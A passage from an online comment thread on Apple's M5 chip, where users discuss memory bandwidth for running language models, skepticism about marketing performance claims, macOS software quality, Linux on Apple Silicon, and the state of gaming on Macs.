      That'll come in the MacBook Pro etc cycle, like last time, then you'll have 512GB RAM

      • bombcar 20 hours ago

        Is the M4 Ultra even out yet? I can't see anything with 512 GB but the M3 Ultra on the Mac Studio (for a cool $4000 more).

        • asimovDev 19 hours ago

          I am interested in seeing if they skip the M4 and go straight to the M5, and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter; I wouldn't be surprised if an M5 Ultra would struggle in a Studio and would require the cooling performance of the Mac Pro case

      • mpeg 20 hours ago

        Same with bandwidth though, usually pro/max memory has much higher speed

        • andy_ppp 20 hours ago

          Yes the M4 Base has 120 GB/s, Pro 273 GB/s and Max has 546 GB/s... That means M5 Pro is potentially around 348 GB/s and M5 Max is almost at 700 GB/s - for comparison a 4090 has around 1,000 GB/s. So pretty incredible!
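
          (Those estimates just scale each M4 tier by the base-model uplift; hypothetical until Apple ships the parts:)

            uplift = 153.6 / 120                      # base M5 over base M4 = 1.28x
            for tier, m4_gb_s in (("Pro", 273), ("Max", 546)):
                print(tier, round(m4_gb_s * uplift))  # Pro ~349, Max ~699 GB/s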

          • sgt 17 hours ago

            Also I think even an M3 Ultra is more cost effective at running LLMs than 4090 or 5090. Mostly due to being more energy efficient. And less fragile than running a gamer PC build.

            • andy_ppp 17 hours ago

              It can run larger models quite slowly but lacks matmul acceleration (included in the M5) that is very useful for context and prompt performance at inference time. I will probably burn my budget with an M5 Max with 256gb (maybe even 512gb) memory, the price will be upsetting but I guess that is life!

              • sgt 15 hours ago

                Yes! I think smaller models on the M3 Ultra are interesting enough, but now with matmul/tensor support on an M5 Ultra or Max, with decent unified memory, it will be a game changer.

                I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

                • andy_ppp 2 hours ago

                  Yes completely, my guess is M6 will have external GPUs perfect for AI accelerators at home and in datacenters.

          • replete 14 hours ago

            I think the M5 Max will be more like 614GB/s, unless they somehow have exceeded DDR5x-9600 or added more than 32 memory controllers

            • andy_ppp 2 hours ago

              DDR5-9600 is 153GB/s from a single channel, and the Max has 4 channels… these are all theoretical values of course - in the real world none of these (even the graphics card) will get near those… so I'm not sure what you're saying.

    • iyn 19 hours ago

      Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.

  • czbond 20 hours ago

    I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?

    • Sohcahtoa82 18 hours ago

      Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

      So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out at ~11 tokens/sec, regardless of how much processing power you have.

      You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.
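
      A minimal sketch of that arithmetic (in GB per token; the "7B at FP16" and bandwidth figures are the numbers from above, everything else is illustrative):

        # Bandwidth-bound decode: every weight is streamed once per token.
        def max_tokens_per_s(params, bits_per_weight, bandwidth_gb_s):
            gb_per_token = params * bits_per_weight / 8 / 1e9
            return bandwidth_gb_s / gb_per_token

        print(max_tokens_per_s(7e9, 16, 153.6))  # ~11 tok/s: 7B model at FP16
        print(max_tokens_per_s(7e9, 4, 153.6))   # ~44 tok/s at 4-bit (dumber, faster)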

      • adastra22 15 hours ago

        I think you mean GB/token

        • Sohcahtoa82 15 hours ago

          Err...yup. My bad. Can't edit it now.

    • modeless 20 hours ago

      The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

      I highly recommend Andrej Karpathy's videos if you want to learn details.

      • pfortuny 19 hours ago

        A very simplified version is: you need the whole matrix to compute a matrix x vector operation, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong, but if you add in compression, etc… you get an idea.
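
        One way to see why that makes LLM decode memory-bound: a matrix-vector product does about one multiply-add per weight loaded, while GPUs can do hundreds of FLOPs per byte of bandwidth. An illustrative count:

          m, n = 4096, 4096
          flops = 2 * m * n          # one multiply + one add per weight
          bytes_read = m * n * 2     # FP16 weights streamed from memory
          print(flops / bytes_read)  # 1.0 FLOP per byte, far below GPU compute/bandwidth ratios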

      • rs186 18 hours ago

        Would you mind specifying which video(s)? He has quite a lot of content to consume.

  • diabllicseagull 20 hours ago

    You don't want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153GB/s is probably not enough bandwidth for an RTX 5090. But for the entry laptop/tablet chip M5? It's likely plenty.

  • chedabob 20 hours ago

    My guess would be those are going into the rumoured OLED models coming out next year.

  • hu3 21 hours ago

    Enough or not, they do describe it like this in an image caption:

    "M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

  • Tepix 19 hours ago

    With MoE LLMs like Qwen 3 30B-A3B that's no longer true.

  • quest88 21 hours ago

    What do you mean by properly? What's the behavior one would observe if they did run an LLM?

    • burnte 20 hours ago

      "Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.

    • nik736 21 hours ago

      If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.

      • Rohansi 18 hours ago

        You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.

paxys 18 hours ago

M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

  • quitit 17 hours ago

    You wrote:

    >Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

    They wrote:

    > Together, they deliver up to 15 percent faster multithreaded performance over M4

    The problem is comprehension, not marketing.

    • Choco31415 17 hours ago

      Not quite. The announcement mentions that:

      “M5 delivers over 4x the peak GPU compute performance for AI”

      In this situation, at least, it’s just referring to AI compute power.

      • mort96 13 hours ago

        Their "peak GPU compute performance for AI" is quite different from your unqualified "performance". I don't know what figures they're quoting, but something stupid like supporting 4-bit floats while the predecessor only supported down to 16-bit floats could easily deliver "over 4x peak GPU compute performance for AI" (measured in FLOPS) without actually making the hardware significantly faster.

        Did they claim 4x peak GPU compute going from the M3 to M4? Or M2 to M3? Can you link to these claims? Are you sure they weren't boasting about other metrics being improved by some multiplier? Not every metric is the same, and different metrics don't necessarily stack with each other.

      • teaearlgraycold 15 hours ago

        Much of this is probably down to optimized transformer kernels.

    • CryptoBanker 17 hours ago

      I think you’re the one misreading here. The 15% refers to CPU speed while the 6x, etc. multiples refer to GPU speed

      • graeme 16 hours ago

        GPU for AI workloads. That plausibly is that much faster, as the Intel laptops with integrated GPUs weren't made for that workload.

  • random3 18 hours ago

    The disconnect is that you're reading sideways.

    First line on their website:

    > M5 delivers over 4x the peak GPU compute performance for AI compared to M4

    It's the GPU, not the CPU (which is what you compare with your old Intel), and it's an AI workload, not your regular workload (which, again, is what you compare).

    • bangaladore 17 hours ago

      And they are comparing peak compute. Which means essentially nothing.

      • random3 17 hours ago

        There was a time when Apple decided that throwing around random technical numbers shouldn't be the news (that came after the megahertz-counting era). Those times have been changing post-Steve Jobs. This said, it is a chip announcement rather than a product announcement, so maybe that is the news.

        • edmundsauto 16 hours ago

          They also lost big during the megahertz wars. Consumers made it clear that they wanted to see number go up and voted with their wallet. There is probably still some cultural remnant of that era.

      • tempodox 17 hours ago

        Do not trust any statistics you did not fake yourself.

  • thebitguru 18 hours ago

    Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership, otherwise good hardware with bad software still leads to bad product, which is what we are seeing now.

    • heresie-dabord 17 hours ago

      > Apple has also seemingly stopped caring about the quality and efficiency of their software.

      Hardware has improved significantly, but it needs software to enable me to enjoy using it.

      Apple is not the only major company that has completely abandoned the users.

      The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

    • Rover222 16 hours ago

      iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.

    • taf2 17 hours ago

      I think 15.6.1 (24G90) will be my last macOS... Omarchy is blazing fast

    • drcongo 17 hours ago

      I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.

    • cmcaleer 17 hours ago

      It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

      No. You exit the Mail app -> go to Settings -> Apps -> scroll through a massive list (that you usually just use for notification settings, btw) to get to Mail -> Mail Accounts -> add new account.

      Just a simple six-step process after you’ve already hunted for it in the mail app.

      • jrmg 17 hours ago

        There’s an “Accounts...” entry in the main “Mail” menu.

        You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

      • ant6n 17 hours ago

        I think the most basic email integration I want from Apple is to be able to set up another email program besides "Mail" as the default, but without having to set up Mail first.

  • cj 17 hours ago

    I’m not sure I see the disconnect.

    At our company we used to buy everyone MacBook Pros by default.

    After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order MacBook Airs for new employees.

    I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

    • wlesieutre 17 hours ago

      What's crazy about that to me is the Macbook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.

      • mort96 13 hours ago

        Well, the power efficiency of Apple Silicon combined with their firmware and drivers is really something. ARM doesn't have much to do with it.

        • zenware 11 hours ago

          Well, I hate to be the bearer of bad news, but Apple Silicon CPUs are entirely based on the ARM architecture, and Apple elected to use ARM, among other reasons, because it has lower power consumption and lower heat generation compared to CISC architectures.

          • matthewmacleod 6 hours ago

            This is just folklore.

            “ARM architecture” in the sense it’s used by Apple is just an ISA. The ISA obviously has some effect on power consumption (e.g. avoiding complex CISC decode). But in reality, by far the most significant driver of CPU efficiency and power consumption is process node.

    • charliebwrites 17 hours ago

      Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

      I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

      The only thing it can't do is run Ableton in a low-latency way without heavily changing the defaults

      You press a key on the keyboard to play a note and half a second later you hear it

      Other than that, zero regrets

      • cyberpunk 16 hours ago

        That's weird, my M1 Air handles Ableton absolutely fine.

        Something's off with your setup.

    • hartator 17 hours ago

      > After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

      Regular MBs are not really a thing anymore. You mean Airs?

      • cj 17 hours ago

        Yes, fixed!

    • hibikir 15 hours ago

      In 2021, we bought everyone M1 Pros with 32 gigs of RAM. Historically, keeping a developer on a 4-year-old laptop would have been crazy, but nobody is really calling for upgrades like we did back when we got rid of the Intels.

    • ahmeneeroe-v2 16 hours ago

      Absolutely true. I now know that I only need an MBA, not an MBP.

  • condiment 18 hours ago

    It's GPU performance.

    Spin up Ollama and run some inference on your 5-year-old Intel MacBook. You won't see a 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

    • blihp 17 hours ago

      Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

      [1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

    • jandrese 18 hours ago

      Comparing GPU performance to some half decade old Intel IGP seems like lying with statistics.

      "Look how many times faster our car is![1]"

      [1] "Compared to a paraplegic octogenarian in a broken wheelchair!"

      • umanwizard 17 hours ago

        Well, Apple isn’t making that comparison, the OP was.

  • leakycap 16 hours ago

    > So, where is the disconnect here?

    > I can say with utmost certainty that it isn't 4000x faster

    The numbers you provided do not come to 4000x faster (closer to 2400x)

    > Why is actual user experience not able to keep up with benchmarks and marketing?

    Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

    The 5x, 6x, 4x numbers you describe across marketing over many years don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them, and the marketing worked, because the only thing you're recalling is the big number.

    Often, every M-series chip is a HUGE advancement over the past in GPU. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing it to is often an Intel iGPU like the Iris Xe or UHD series. These were low end trash iGPUs even when Apple launched those Intel devices, so being impressed by 5x performance when the M1 came out was in part because the Intel Macs had such terrible integrated graphics.

    The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% meaningful year-over-year speed increase. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump, but not an Intel-to-M1 jump, even from M1 to M4.
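
    For what it's worth, naively stacking the quoted factors gives:

      from math import prod
      print(prod([4, 5, 4, 4, 6]), prod([6, 5, 4, 4, 6]))  # 1920 2880
      # i.e. ~1900-2900x, not 4000x -- and since each factor measures a
      # different metric, multiplying them is invalid in the first place.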

  • semiinfinitely 17 hours ago

    All those extra flops are spent computing light refraction in the liquid glass of the ui

  • tylerhou 18 hours ago

    > M5 is 4-6x more powerful than M4

    In GPU performance (probably measured on a specific set of tasks).

  • james4k 18 hours ago

    Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.

  • 0x457 17 hours ago

    Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

    The disconnect here is that you can't read. Sorry, no other way to say it.

  • tmountain 18 hours ago

    Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the actual improvements when running workloads that benefit from the performance improvements (i.e., complex calculations that can live in the CPU and its cache).

  • vintagedave 18 hours ago

    What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago.) Somehow the graphics in general seems slower on Tahoe, eg the effects when minimising a window.

    I am deeply concerned all the performance benefits of the new chips will get eaten away.

    • MobiusHorizons 17 hours ago

      You are probably actually witnessing the reduction in performance of swap as your drive fills up. Check the memory pressure in Activity Monitor. The fix is pretty easy (delete stuff).

      • vintagedave 16 hours ago

        Thanks, but I have over a hundred gig free. And I got the max RAM I could (24GB.) I feel like the machine _should_ be capable in 2025.

    • Tagbert 17 hours ago

      26.0 is very much a dot-zero release. It is missing a lot of optimizations and there are some open bugs like memory leaks. Initial reports on 26.1 show a lot of improvement in those. The 3rd beta of 26.1 just came out yesterday. They will probably launch this new version with improved optimizations by end of October.

  • justinator 18 hours ago

    You know, 64% of statistics are made up.

    • NetMageSCW 11 hours ago

      I’m pretty sure that should be 100%.

  • omikun 15 hours ago

    Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically M4 was only a little faster than M1 at this task. Ex. if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

    Unless you're looking at your MacBook running LM Studio you won't be seeing much improvement in this regard.

  • monocasa 18 hours ago

    Each is a different specific benchmark, so they don't stack the way you're doing.

    This is 4-6x faster in AI for instance.

  • foota 17 hours ago

    User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and, at the limit, memory latency are the key constraints.

  • Jnr 18 hours ago

    It states it is "peak performance". Probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before it drops the performance.

  • freehorse 18 hours ago

    They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stack up. Here, 4x refers to something about LLMs running on the GPU.

    I use both an M1 Max and an M3 Max, and frankly I do not notice much difference in most stuff if you control for the core count. And for running LLMs they are almost the same performance. I think from M1 to M3 there was not much performance increase in general.

  • oulipo2 17 hours ago

    Agreed, if I have 40 tabs open in Chrome, my M1 MacBook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage

  • tester756 18 hours ago

    Because this is bullshit, lies, marketing

  • potatolicious 17 hours ago

    Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

    Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

    But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

    For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

    Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

    Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on a Intel MacBook Air was a total pipe dream. Now a base spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

    A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

bfrog 20 hours ago

The big win would be a Linux-capable device. I don't have any interest in macOS, but the Apple M parts always seem amazing.

In theory this is where Qualcomm would come in and provide something, but in practice they seem to be stuck in Qualcomm land, where only lawyers matter and actual users and developers can get stuffed.

  • cogman10 19 hours ago

    Yeah, this is the biggest hole in ARM offerings.

    The only well supported devices are either phones or servers with very little in between.

    Even common consumer devices like wifi routers will have ARM SoCs pinned to the kernel version they shipped with, which gets supported for 1 to 2 years at most.

  • nc 2 hours ago

    Asahi Linux is making great progress. The only thing they have left to make it a truly capable Linux environment is USB-C external display support. Once that lands I plan to use my M-series Mac as a Linux machine.

  • mrkeen 19 hours ago

    I have a pretty good time on Asahi Fedora (MacBook Air M1). It supposedly also supports the M2 but no higher.

    And it's a PITA to install (it needs to be started from within macOS, using scripts, with the partitions already in a good state)

    • neobrain an hour ago

      > And it's a PITA to install

      Curiously I found it a breeze since it didn't require digging out a flashable boot medium and pointing your BIOS to it. Calling a script from your normal desktop environment and having it automatically boot into the installer was really nice.

      > with the partitions already in a good state)

      What's this about? The script takes care of resizing the macOS partitions and creating new ones for Linux.

    • mysteria 15 hours ago

      The issue is that it's hacky, and in that case I'd rather go with an Intel or AMD x86 system with more or less out-of-the-box Linux support. What we're looking for is a performant ARM system where Linux is a first-class citizen.

    • Gethsemane 19 hours ago

      If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...

    • 2OEH8eoCRo0 19 hours ago

      How's Thunderbolt and display port alt mode?

      • neobrain an hour ago

        Actively in progress, with related patches submitted to the kernel mailing list as recently as 3 days ago.

  • walterbell 18 hours ago

    Apparently the Windows exclusivity period has ended, so Google will support Android and ChromeOS on Qualcomm X2-based devices, https://news.ycombinator.com/item?id=45368167

    • bfrog 11 hours ago

      I mean if the experience is as good as any x86 laptop I'd try it in terms of installing any linux distro I want. No interest in android/chromeos myself.

      • walterbell 11 hours ago

        Even Android/ChromeOS should support standard Debian Linux in a VM. If Qualcomm makes a Linux dev box available (announced last year for X1, then sadly cancelled) with UEFI/SystemReady, then mainline Linux developers could contribute to device support.

littlecranky67 21 hours ago

And here I am, selling my MacBook M4 Pro to buy a MacBook Air and a dedicated gaming machine. I've tried gaming on the MacBook with Heroic, GPTK, Whiskey, the RPCS3 emulator, and some native titles. When a game runs, the performance is stunning for a laptop, but there are always glitches, bugs, and annoyances that take the joy out of it. Needless to mention the lack of support for any sort of online multiplayer, due to the lack of anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

  • ryao 20 hours ago

    Off the top of my head, here is what that needs:

      1. Implementing PR_SET_SYSCALL_USER_DISPATCH
      2. Implementing ntsync
      3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
      4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
    
    That said, there are alternatives to those things.

      1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
      2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
      3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
      4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
    
    https://github.com/KhronosGroup/MoltenVK/issues/203

    It is a shame that they do not work with Valve on these things. If they did, Proton would likely be supported for macOS from within Steam, and GPTK would benefit.

  • bob1029 20 hours ago

    > lack of anticheat support.

    I just redid my windows machine to get at TPM2.0 and secure boot for Battlefield 6. I did use massgrave this time because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff but it runs much better than the old CSM bios mode.

    Anything not protected by kernel level anti cheats I play on my steam deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a linux handheld.

    • zhivota 6 hours ago

      It's funny considering what people are telling me about the rampant cheating in that game. It may settle out eventually, but these anticheat systems seem to not do much.

  • dlojudice 20 hours ago

    Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially happened, which amounts to the same thing.

    In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

  • unsupp0rted 20 hours ago

    I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.

    • HDThoreaun 18 hours ago

      I have never once used my laptop speakers. Not saying you're wrong, but it's crazy how different priorities for products can be.

      • prewett 15 hours ago

        I was shocked when I tried out the 2019 MBP speakers; they were almost as good as my (low-end) studio headphones. I was even more shocked by the M2 speakers, which are arguably better (although not as flat a frequency response, I think; there definitely is something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to on par with decent headphones. Perhaps they aren't on par with $400 headphones; I've never had any of those. But now by preference I listen on the laptop speakers. It's not a priority (I'm totally happy to go back to the headphones), more like an unexpected perk.

        • adastra22 15 hours ago

          But why would you ever use the speakers?

          • unsupp0rted 13 hours ago

            I work alone- I can use the speakers at any volume without bothering anybody or wearing anything in my ears or on my head. It's wonderful.

  • hannesfur 20 hours ago

    I agree: the difference between the various compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it's hard to believe, but running GTA Online is brittle and clunky… Even when games have native macOS builds, it's rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception though: Arma 3 has experimental Apple Silicon support, though it comes with significant limitations (multiplayer, flying & mods). Although I don't believe it's in Apple's interest, gaming on Linux might become an option in the future, even on Mac, but the lack of ARM builds is an even bigger problem there…

    Since I mostly play MSFS 2024 these days, I currently use GeForce Now, which is fine, but cloud gaming still isn't quite there yet…

    • kllrnohj 19 hours ago

      > Death Stranding on my M2 Pro looks so good it’s hard to believe,

      Death Stranding is a great-looking game to be sure, but it's also kinda hard to get excited about a 5-year-old game achieving RTX 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

  • gbil 19 hours ago

    On top of that, what is Apple's strategy on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? That is unsustainable, to put it mildly. There are eGPU enclosures with TB5; developing something like that for the Mac would make more sense if they really cared about gaming.

  • ge96 19 hours ago

    I'm gonna be looking for a 4080 in SFF form factor since my current gaming rig can't get upgraded to win 11. Also I wouldn't mind a smaller desktop.

    edit: for now I'll get that win 10 ESU

  • gwbas1c 20 hours ago

    Honestly, gaming consoles are so much cheaper and "no hassle." I never game on my Mac.

    • littlecranky67 18 hours ago

      More expensive in the long run, as the games are more expensive and you need some kind of subscription to play online.

  • dimgl 20 hours ago

    Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

    I've been trying to get Unreal Engine to work on my Macbook but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support it.

  • mrcwinn 19 hours ago

    Going back to the Air's screen from your Pro will be a steep fall.

    • littlecranky67 18 hours ago

      Not really, 95% of the time I use it in a dock with 2 external screens.

  • bamboozled 21 hours ago

    Sometimes I just feel like buying the latest and greatest game. I have an M4 too, and the choices are usually quite abysmal. I agree.

    • qnpnp 18 hours ago

      My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).

      • bamboozled 9 hours ago

        Thanks, will check it out!

  • sapiogram 20 hours ago

    > I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

    Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

    • dralley 20 hours ago

      Several games with anticheat work. But it's up to the developers whether they check the box that allows it to work, which is why even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

      Of course some anticheats aren't supported at all, like EA Javelin.

      • ascagnel_ 19 hours ago

        Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

        https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

    • rpdillon 20 hours ago

      Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.

  • gjsman-1000 20 hours ago

    Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs, GNM, GNMX, PSSL). Nintendo supports Vulkan but performance is so bad, almost everyone uses the proprietary API (NVN / NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird AAA couldn't pull from that industry if they wished.

    • coldpie 20 hours ago

      The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

      No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

      • galad87 20 hours ago

        Game developers make most of their money shortly after a game's release, so having a 15-year-old game stop working shouldn't make much difference in terms of revenue.

        Anyway, the whole situation was quite bad. Many games were still 32-bit, even though macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either: the Steam store is full of 64-bit games mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit; instead they decided to do nothing and left the chaos in place.

        The best solution would have been a lightweight VM to run old 32-bit games; computers nowadays are powerful enough to do so.

      • gjsman-1000 20 hours ago

        I've heard this argument, but it also doesn't pass the sniff test in 2025.

        1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

        2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

        3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

        We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

        • fruitworks 20 hours ago

          What happens when Apple switches to RISC-V, or deprecates versions of Metal in a backwards-incompatible way, or mandates some new code-signing technique?

          The attitude in the apple developer ecosystem is that apple tells you to jump, and you ask how high.

          You could complain that PlayStation 4 software is incompatible with PlayStation 3, but this is the PC gaming industry; there are higher standards for software compatibility here, which only a couple of companies can ignore.

          • gjsman-1000 20 hours ago

            Apple will never transition to RISC-V, especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM, and their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption that RISC-V will eventually reach parity with ARM performance is untested; ISAs do sometimes fail at scale (Itanium, anyone?). While a repeat is unlikely, even a discovered 5% structural deficit would handicap adoption permanently.

            "This is the PC gaming industry"

            Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

            • fruitworks 20 hours ago

              Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive expanding back-catalog of old software, far more competition in the market, mods, and you're able to run whatever software you want alongside games (discord, teamspeak, game streaming, etc.).

              Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

              • gjsman-1000 19 hours ago

                Steam Deck - 6 million

                Sega Saturn - 9 million

                Wii U - 13 million

                PlayStation 5 - 80 million

                Nintendo Switch - 150 million

                Nintendo Switch 2 opening weekend - 4 million in 3 days

                Sure.

                • Sohcahtoa82 18 hours ago

                  And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

                  https://store.steampowered.com/stats/stats/

                  If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

                  Unfortunately, there's no possible way to get an exact number. There are multiple gaming-PC manufacturers, not to mention all the gaming PCs built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by ourselves or by a friend or family member. https://pdxlan.net/lan-stats/

        • coldpie 20 hours ago

